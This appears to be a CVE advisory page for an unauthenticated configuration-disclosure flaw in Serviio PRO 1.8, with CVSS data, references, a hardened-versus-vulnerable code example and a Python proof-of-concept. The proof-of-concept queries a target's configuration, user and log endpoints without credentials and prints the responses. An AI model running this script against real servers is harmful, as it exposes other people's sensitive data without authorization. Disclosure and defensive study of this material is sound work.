Security Vulnerability Report
CVE-2017-20217 CVSS 7.5 HIGH

CVE-2017-20217

Published: 2026-03-16 14:17:51
Last Modified: 2026-04-15 14:56:46

Description

Serviio PRO 1.8 contains an information disclosure vulnerability due to improper access control enforcement in the Configuration REST API that allows unauthenticated attackers to access sensitive information. Remote attackers can send specially crafted requests to the REST API endpoints to retrieve potentially sensitive configuration data without authentication.
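The weakness class behind this entry (CWE-306, a sensitive REST resource served with no authentication check) is easiest to see as code. The block below is an added example, not Serviio's code and not taken from any of the referenced advisories: a minimal WSGI "configuration" endpoint in the vulnerable shape beside a hardened version that enforces HTTP Basic credentials before touching the data and redacts secret-bearing fields even for authenticated callers. The resource path /rest/configuration, the sample configuration, the credential and the field names are all assumptions; the handlers are exercised in-process with wsgiref, so nothing is sent over the network.

```python
# Added example (not Serviio's code): vulnerable vs. hardened configuration endpoint.
# Path, config keys and credentials below are constructed for illustration.
import base64
import hmac
import json
from wsgiref.util import setup_testing_defaults

# Constructed sample configuration; the two secret fields are what an
# unauthenticated caller must never be able to read.
CONFIG = {
    "mediaRoot": "/srv/media",
    "proxyPassword": "s3cr3t-proxy",
    "onlineSourcesApiKey": "AKIA-EXAMPLE",
    "remotePort": 23423,
}
SECRET_KEYS = {"proxyPassword", "onlineSourcesApiKey"}

# Constructed admin credential. A real server stores a salted hash, not clear text.
ADMIN_USER = "admin"
ADMIN_PASS = "correct horse battery staple"

# Assumed resource path for the example; not necessarily the product's real route.
CONFIG_PATH = "/rest/configuration"


def _json(start_response, status, body, extra_headers=()):
    """Serialise a JSON response through the WSGI start_response callback."""
    payload = json.dumps(body).encode()
    headers = [("Content-Type", "application/json"),
               ("Content-Length", str(len(payload)))] + list(extra_headers)
    start_response(status, headers)
    return [payload]


def vulnerable_app(environ, start_response):
    """CWE-306 shape: any GET on the configuration resource is answered in full."""
    if environ["PATH_INFO"] == CONFIG_PATH and environ["REQUEST_METHOD"] == "GET":
        return _json(start_response, "200 OK", CONFIG)
    return _json(start_response, "404 Not Found", {"error": "not found"})


def _authenticated(environ):
    """Validate HTTP Basic credentials; both comparisons run in constant time."""
    scheme, _, token = environ.get("HTTP_AUTHORIZATION", "").partition(" ")
    if scheme.lower() != "basic" or not token:
        return False
    try:
        user, _, password = base64.b64decode(token, validate=True).decode().partition(":")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return False
    ok_user = hmac.compare_digest(user.encode(), ADMIN_USER.encode())
    ok_pass = hmac.compare_digest(password.encode(), ADMIN_PASS.encode())
    return ok_user and ok_pass


def hardened_app(environ, start_response):
    """Same resource: authentication is enforced before the data is read, and
    secret-bearing fields are redacted even for an authenticated admin."""
    if environ["PATH_INFO"] != CONFIG_PATH:
        return _json(start_response, "404 Not Found", {"error": "not found"})
    if not _authenticated(environ):
        return _json(start_response, "401 Unauthorized",
                     {"error": "authentication required"},
                     [("WWW-Authenticate", 'Basic realm="config"')])
    if environ["REQUEST_METHOD"] != "GET":
        return _json(start_response, "405 Method Not Allowed", {"error": "method not allowed"})
    redacted = {k: ("***" if k in SECRET_KEYS else v) for k, v in CONFIG.items()}
    return _json(start_response, "200 OK", redacted)


def call(app, path, auth=None, method="GET"):
    """Invoke a WSGI app in-process (no network); return (status line, parsed JSON body)."""
    environ = {"PATH_INFO": path, "REQUEST_METHOD": method}
    if auth:
        environ["HTTP_AUTHORIZATION"] = "Basic " + base64.b64encode(auth.encode()).decode()
    setup_testing_defaults(environ)  # fills in the remaining required WSGI keys
    captured = {}

    def start_response(status, headers):
        captured["status"] = status

    body = b"".join(app(environ, start_response))
    return captured["status"], json.loads(body)


if __name__ == "__main__":
    print("vulnerable, no credentials:", call(vulnerable_app, CONFIG_PATH))
    print("hardened,   no credentials:", call(hardened_app, CONFIG_PATH))
    print("hardened,   admin:         ",
          call(hardened_app, CONFIG_PATH, auth=f"{ADMIN_USER}:{ADMIN_PASS}"))
```

The fix is the ordering in hardened_app: the credential check runs before any configuration data is touched, a failed check yields 401 with a WWW-Authenticate header rather than a partial body, and redaction of secret fields limits what even a legitimate session can exfiltrate.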

CVSS Details

CVSS Score (v3.1, primary)
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Exploitability / Impact sub-scores
3.9 / 3.6
CVSS Score (v4.0, secondary)
8.7
Severity
HIGH
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N (threat and environmental metrics not defined)
Weakness
CWE-306 (Missing Authentication for Critical Function)

Configurations (Affected Products)

No CPE configuration data is available for this entry. Products listed on this page:

Serviio PRO 1.8
Serviio PRO 1.7 (possibly affected)
Serviio PRO 1.6 (possibly affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. The endpoint paths and port are those published with this PoC; confirm them against the references before relying on the result, and treat a 401 as the expected response from a fixed or access-restricted install.
python
#!/usr/bin/env python3
"""
CVE-2017-20217 PoC - Serviio PRO 1.8 Unauthenticated Configuration Access

This PoC demonstrates the information disclosure vulnerability in the Serviio REST API.
"""
import json
import sys

import requests


def exploit_serviio(target_ip, target_port=23423):
    """
    Exploit the unauthenticated access to the Serviio Configuration REST API.

    Args:
        target_ip: Target Serviio server IP address
        target_port: Serviio REST API port (default: 23423)
    """
    base_url = f"http://{target_ip}:{target_port}"

    # Sensitive API endpoints that can be accessed without authentication
    endpoints = [
        "/api/configuration",
        "/api/users",
        "/api/logs",
        "/api/status",
    ]

    print(f"[*] Targeting Serviio server at {target_ip}:{target_port}")
    print("=" * 60)

    for endpoint in endpoints:
        try:
            print(f"\n[*] Accessing endpoint: {endpoint}")
            url = base_url + endpoint

            # Send unauthenticated request
            response = requests.get(url, timeout=10)

            if response.status_code == 200:
                print(f"[+] SUCCESS: Retrieved data from {endpoint}")
                try:
                    data = response.json()
                    print(f"[+] Response data: {json.dumps(data, indent=2)[:500]}")
                except ValueError:
                    # Body was not JSON; show the raw text instead
                    print(f"[+] Response text: {response.text[:500]}")
            elif response.status_code == 401:
                print(f"[-] Authentication required for {endpoint}")
            else:
                print(f"[-] Unexpected status code: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[-] Error accessing {endpoint}: {e}")

    print("\n[*] PoC execution completed")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2017-20217-poc.py <target_ip> [port]")
        print("Example: python cve-2017-20217-poc.py 192.168.1.100 23423")
        sys.exit(1)

    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 23423
    exploit_serviio(target, port)

References

http://www.securitylab.ru/poc/486048.php
https://blogs.securiteam.com/index.php/archives/3094
https://cxsecurity.com/issue/WLB-2017050022
https://exchange.xforce.ibmcloud.com/vulnerabilities/125646
https://packetstormsecurity.com/files/142383
https://www.exploit-db.com/exploits/41958/
https://www.vulncheck.com/advisories/serviio-pro-rest-api-information-disclosure
https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5404.php
Raw JSON Data

JSON
{"cve": {"id": "CVE-2017-20217", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:51.090", "lastModified": "2026-04-15T14:56:45.970", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Serviio PRO 1.8 contains an information disclosure vulnerability due to improper access control enforcement in the Configuration REST API that allows unauthenticated attackers to access sensitive information. Remote attackers can send specially crafted requests to the REST API endpoints to retrieve potentially sensitive configuration data without authentication."}, {"lang": "es", "value": "Serviio PRO 1.8 contiene una vulnerabilidad de revelación de información debido a una aplicación inadecuada del control de acceso en la API REST de configuración que permite a atacantes no autenticados acceder a información sensible. Atacantes remotos pueden enviar solicitudes especialmente diseñadas a los puntos finales de la API REST para recuperar datos de configuración potencialmente sensibles sin autenticación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", 
"modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "http://www.securitylab.ru/poc/486048.php", "source": "[email protected]"}, {"url": "https://blogs.securiteam.com/index.php/archives/3094", "source": "[email protected]"}, {"url": "https://cxsecurity.com/issue/WLB-2017050022", "source": "[email protected]"}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/125646", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/142383", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/41958/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/serviio-pro-rest-api-information-disclosure", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5404.php", "source": "[email protected]"}]}}